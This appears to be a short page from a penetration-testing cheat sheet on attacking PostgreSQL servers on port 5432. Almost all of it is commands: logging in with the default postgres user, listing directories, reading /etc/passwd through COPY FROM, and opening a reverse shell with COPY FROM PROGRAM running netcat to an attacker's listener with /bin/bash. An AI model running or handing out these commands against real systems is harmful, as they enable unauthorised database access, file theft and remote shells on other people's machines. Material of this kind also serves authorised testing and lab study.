Port 5432 - Postgres

psql -h $IP -p 5432 -U postgres -W postgres
\list, \c postgres, \d
select pg_ls_dir('/')

Read a file:

create table demo (t text); copy demo from '/etc/passwd'; select * from demo;

Shell:

  • Check Nibbles, splodge for RCE

  • Switch to db app:

\c app
drop table if exists cmd_exec;
create table cmd_exec(cmd_output text);

  • Setup nc listener

COPY cmd_exec FROM PROGRAM 'nc $IP $PORT -e /bin/bash';
PreviousPort 3389 - RDPNextPort 6379 - Redis

Last updated